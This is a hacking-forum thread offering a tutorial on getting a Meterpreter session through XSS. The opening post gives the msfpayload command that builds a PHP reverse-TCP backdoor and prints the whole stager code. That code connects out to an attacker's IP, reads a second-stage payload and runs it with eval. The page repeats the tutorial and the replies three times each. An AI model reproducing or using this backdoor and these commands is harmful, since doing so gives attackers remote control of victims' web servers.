![]() |
|
Meterpreter Session through XSS - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Website & Server Hacking (https://sinister.li/Forum-Website-Server-Hacking) +--- Thread: Meterpreter Session through XSS (/Thread-Meterpreter-Session-through-XSS) Pages:
1
2
|
Meterpreter Session through XSS - RaccoonCity_mybb_import13707 - 10-24-2013 NOTE: THIS IS A TUTORIAL I MADE IN AN ANOTHER HACKFORUM. Shell XSS Tutorial 1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php". ![]() 2.Now, open a new terminal window and enter "msfconsole". ![]() 3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it: ![]() Code: #<?php
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
$port = 4444;
$ipf = AF_INET;
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
$ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
[b]4.[/b] [color=#FF0000]Now, at the top, remove the hashtag (#) from #<?php.Meterpreter Session through XSS - RaccoonCity_mybb_import13707 - 10-24-2013 NOTE: THIS IS A TUTORIAL I MADE IN AN ANOTHER HACKFORUM. Shell XSS Tutorial 1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php". ![]() 2.Now, open a new terminal window and enter "msfconsole". ![]() 3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it: ![]() Code: #<?php
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
$port = 4444;
$ipf = AF_INET;
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
$ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
[b]4.[/b] [color=#FF0000]Now, at the top, remove the hashtag (#) from #<?php.Meterpreter Session through XSS - RaccoonCity_mybb_import13707 - 10-24-2013 NOTE: THIS IS A TUTORIAL I MADE IN AN ANOTHER HACKFORUM. Shell XSS Tutorial 1.Open a terminal and enter "msfpayload php/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 R >phpbackdoor.php". ![]() 2.Now, open a new terminal window and enter "msfconsole". ![]() 3.While waiting for the console to open enter "nano phpbackdoor.php" in the first terminal window. It will look like this when you open it: ![]() Code: #<?php
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = 'IPHERE';
$port = 4444;
$ipf = AF_INET;
if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip = "[". $ip ."]";
$ipf = AF_INET6;
}
if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
[b]4.[/b] [color=#FF0000]Now, at the top, remove the hashtag (#) from #<?php.RE: Meterpreter Session through XSS - unnamed - 10-24-2013 I would advise using the code tags to make the thread look nicer. RE: Meterpreter Session through XSS - unnamed - 10-24-2013 I would advise using the code tags to make the thread look nicer. RE: Meterpreter Session through XSS - unnamed - 10-24-2013 I would advise using the code tags to make the thread look nicer. RE: Meterpreter Session through XSS - RaccoonCity_mybb_import13707 - 10-24-2013 (10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer. Okay, thanks! RE: Meterpreter Session through XSS - RaccoonCity_mybb_import13707 - 10-24-2013 (10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer. Okay, thanks! RE: Meterpreter Session through XSS - RaccoonCity_mybb_import13707 - 10-24-2013 (10-24-2013, 03:58 PM)Ergo Proxy Wrote: I would advise using the code tags to make the thread look nicer. Okay, thanks! RE: Meterpreter Session through XSS - phiber - 01-23-2014 anyone knows why i opened a meterpreter session with my own PC when i tried to use php/meterpreter/reverse_tcp payload even though my other pc opened the link?
|